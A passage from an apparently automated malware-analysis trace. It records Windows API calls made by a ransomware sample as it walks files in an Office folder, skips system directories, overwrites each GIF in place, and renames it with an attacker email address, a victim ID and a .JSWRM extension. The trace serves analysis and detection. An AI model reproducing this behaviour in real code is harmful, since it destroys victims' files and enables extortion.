lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x3320, lpOverlapped=0x0) returned 1 [0119.195] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.195] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3320, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x3320, lpOverlapped=0x0) returned 1 [0119.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.195] CloseHandle (hObject=0x314) returned 1 [0119.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0119.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0119.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0119.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.195] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR30B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir30b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR30B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir30b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0119.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.196] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4bda, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR30F.GIF", cAlternateFileName="")) returned 1 [0119.196] lstrcmpiW (lpString1="PDIR30F.GIF", lpString2=".") returned 1 [0119.196] lstrcmpiW (lpString1="PDIR30F.GIF", lpString2="..") returned 1 [0119.196] lstrcmpiW (lpString1="PDIR30F.GIF", lpString2="...") returned 1 [0119.196] lstrcmpiW (lpString1="PDIR30F.GIF", lpString2="windows") returned -1 [0119.196] lstrcmpiW (lpString1="PDIR30F.GIF", lpString2="recovery") returned -1 [0119.196] lstrcmpiW (lpString1="PDIR30F.GIF", lpString2="perflogs") returned -1 [0119.196] lstrcmpiW (lpString1="PDIR30F.GIF", lpString2="documents and settings") returned 1 [0119.196] lstrcmpiW (lpString1="PDIR30F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.196] lstrcmpiW (lpString1="PDIR30F.GIF", lpString2="system volume information") returned -1 [0119.196] lstrcmpiW (lpString1="PDIR30F.GIF", lpString2="msocache") returned 1 [0119.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR30F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR30F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR30F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0119.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR30F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR30F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR30F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0119.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0119.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0119.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR30F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir30f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.197] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19418) returned 1 [0119.197] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4bd0) returned 0x24c1d0 [0119.197] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4bd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x4bd0, lpOverlapped=0x0) returned 1 [0119.209] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.209] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4bd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x4bd0, lpOverlapped=0x0) returned 1 [0119.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.210] CloseHandle (hObject=0x314) returned 1 [0119.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0119.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0119.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0119.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0119.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.210] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR30F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir30f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR30F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir30f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0119.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0119.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.212] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad3eea7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x838, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR31B.GIF", cAlternateFileName="")) returned 1 [0119.212] lstrcmpiW (lpString1="PDIR31B.GIF", lpString2=".") returned 1 [0119.212] lstrcmpiW (lpString1="PDIR31B.GIF", lpString2="..") returned 1 [0119.212] lstrcmpiW (lpString1="PDIR31B.GIF", lpString2="...") returned 1 [0119.212] lstrcmpiW (lpString1="PDIR31B.GIF", lpString2="windows") returned -1 [0119.212] lstrcmpiW (lpString1="PDIR31B.GIF", lpString2="recovery") returned -1 [0119.212] lstrcmpiW (lpString1="PDIR31B.GIF", lpString2="perflogs") returned -1 [0119.212] lstrcmpiW (lpString1="PDIR31B.GIF", lpString2="documents and settings") returned 1 [0119.212] lstrcmpiW (lpString1="PDIR31B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.212] lstrcmpiW (lpString1="PDIR31B.GIF", lpString2="system volume information") returned -1 [0119.212] lstrcmpiW (lpString1="PDIR31B.GIF", lpString2="msocache") returned 1 [0119.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0119.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR31B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR31B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR31B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0119.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0119.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR31B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR31B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR31B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0119.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0119.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0119.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR31B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir31b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.213] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2104) returned 1 [0119.213] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x830) returned 0x20c6c0 [0119.214] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x830, lpOverlapped=0x0) returned 1 [0119.218] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.218] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x830, lpOverlapped=0x0) returned 1 [0119.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0119.218] CloseHandle (hObject=0x314) returned 1 [0119.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0119.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0119.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0119.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.218] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR31B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir31b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR31B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir31b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0119.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0119.219] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x52da, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR31F.GIF", cAlternateFileName="")) returned 1 [0119.219] lstrcmpiW (lpString1="PDIR31F.GIF", lpString2=".") returned 1 [0119.219] lstrcmpiW (lpString1="PDIR31F.GIF", lpString2="..") returned 1 [0119.220] lstrcmpiW (lpString1="PDIR31F.GIF", lpString2="...") returned 1 [0119.220] lstrcmpiW (lpString1="PDIR31F.GIF", lpString2="windows") returned -1 [0119.220] lstrcmpiW (lpString1="PDIR31F.GIF", lpString2="recovery") returned -1 [0119.220] lstrcmpiW (lpString1="PDIR31F.GIF", lpString2="perflogs") returned -1 [0119.220] lstrcmpiW (lpString1="PDIR31F.GIF", lpString2="documents and settings") returned 1 [0119.220] lstrcmpiW (lpString1="PDIR31F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.220] lstrcmpiW (lpString1="PDIR31F.GIF", lpString2="system volume information") returned -1 [0119.220] lstrcmpiW (lpString1="PDIR31F.GIF", lpString2="msocache") returned 1 [0119.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR31F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR31F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR31F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR31F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR31F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR31F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR31F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir31f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.221] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21210) returned 1 [0119.221] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x52d0) returned 0x24c1d0 [0119.221] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x52d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x52d0, lpOverlapped=0x0) returned 1 [0119.243] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.243] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x52d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x52d0, lpOverlapped=0x0) returned 1 [0119.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0119.244] CloseHandle (hObject=0x314) returned 1 [0119.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) 